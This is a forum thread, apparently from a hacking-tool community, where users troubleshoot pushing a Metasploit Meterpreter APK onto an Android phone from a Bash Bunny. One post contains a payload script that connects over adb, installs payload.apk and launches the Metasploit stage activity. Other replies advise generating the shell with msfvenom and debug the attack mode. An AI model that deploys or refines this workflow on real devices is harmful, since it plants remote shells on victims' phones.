Jump to content
Harold Finch

Payload for android

Recommended Posts

Hi dear friends. I watched to this video. But I dont know, which payload he was use in this video. So, what do you think about it? Which payload must be it?

 

Share this post


Link to post
Share on other sites

I've seen a variation of this one before but I can't remember what it was called - though it was mainly used for Android TVs that had cameras and things in-built.

Share this post


Link to post
Share on other sites

just looked until minute 2... Seems like there is only a meterpreter shell started on the device.... So just create a meterpreter shell with msfvenom, execute it on the phone and receive the connection on your metasploit computer.

Edited by GermanNoob
Detailed what to do...

Share this post


Link to post
Share on other sites
12 hours ago, GermanNoob said:

just looked until minute 2... Seems like there is only a meterpreter shell started on the device.... So just create a meterpreter shell with msfvenom, execute it on the phone and receive the connection on your metasploit computer.

I did it. I created payload.apk but I cant install it to my android phone with bash bunny.... Where I'm wrong, I dont know.

 

This is attackmode commands in payload.txt :

 

ATTACKMODE HID
source /bin/bunny_helpers.sh
if [ -z "{$TARGET_IP}" ]; then
LED R 2000
exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED G

Share this post


Link to post
Share on other sites

Sorry, I never worked really with android, so I don't know adb at all. Have you checked within the logs of adb which commands work or don't work? I'm also not sure if you need to install the msf payload. Is a elf file not allowed to run on android?

Edit:

Uh, that hurts... I oversaw the obvious problem: You are using the wrong ATTACKMODE. The target will not get any IP as the you aren't using an ethernet attack... And obviously you aren't using QUACK commands, so ATTACKMODE HID seems not to be needed...

 

Edited by GermanNoob
Oversaw the real problem

Share this post


Link to post
Share on other sites

I'm personally rewriting this script, going to try and make it accessible for Android 6+ (Marshmallow). So far I have the script rewrote, just having issues with IP's.. 

I'll keep everyone posted within the week on whats going on. 

(Side Note - I just got Zelda: Breath of the Wild, so forgive the absence.. Everyone needs a break from every now and then.)

 

-Ar1k88

  • Upvote 2

Share this post


Link to post
Share on other sites
On 4/2/2018 at 1:16 AM, Ar1k88 said:

I'm personally rewriting this script, going to try and make it accessible for Android 6+ (Marshmallow). So far I have the script rewrote, just having issues with IP's.. 

I'll keep everyone posted within the week on whats going on. 

(Side Note - I just got Zelda: Breath of the Wild, so forgive the absence.. Everyone needs a break from every now and then.)

 

-Ar1k88

well... ? still waiting

 

JMX

Share this post


Link to post
Share on other sites

Haha, I stopped at trying to get adb access to allow the BashBunny to push files.. I can get it to install, but not run.. something with how the BashBunny sends the adb command to the ADB protocol.. 

But I got sidetracked, been developing a website to allow Cryptocurrency to be held for super cheap.. Ugh I got so many things going on.. 

 

?

Share this post


Link to post
Share on other sites
13 minutes ago, LowValueTarget said:

In order to work with ADB, the BashBunny needs to be a Host -- currently , there is no way to make the BB run as a host afaik.

Idk what you're talking about BashBunny is running ADB perfectly fine..

Share this post


Link to post
Share on other sites
11 minutes ago, Ar1k88 said:

Idk what you're talking about BashBunny is running ADB perfectly fine..

It's connecting to the phone?

Of course ADB will run -- but will it connect?

Share this post


Link to post
Share on other sites

It runs no problem.. can push a apk, and install it.. BUT the syntax for running the apk after install is giving issues..

Share this post


Link to post
Share on other sites
3 minutes ago, LowValueTarget said:

Interesting -- good to know.

Of course! I've just been super busy with other projects.. But if anyone needs any help or anything, just message me..  I've been doing crazy 15hour coding stretches so I'm just too exhausted for multiple projects at the moment..

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...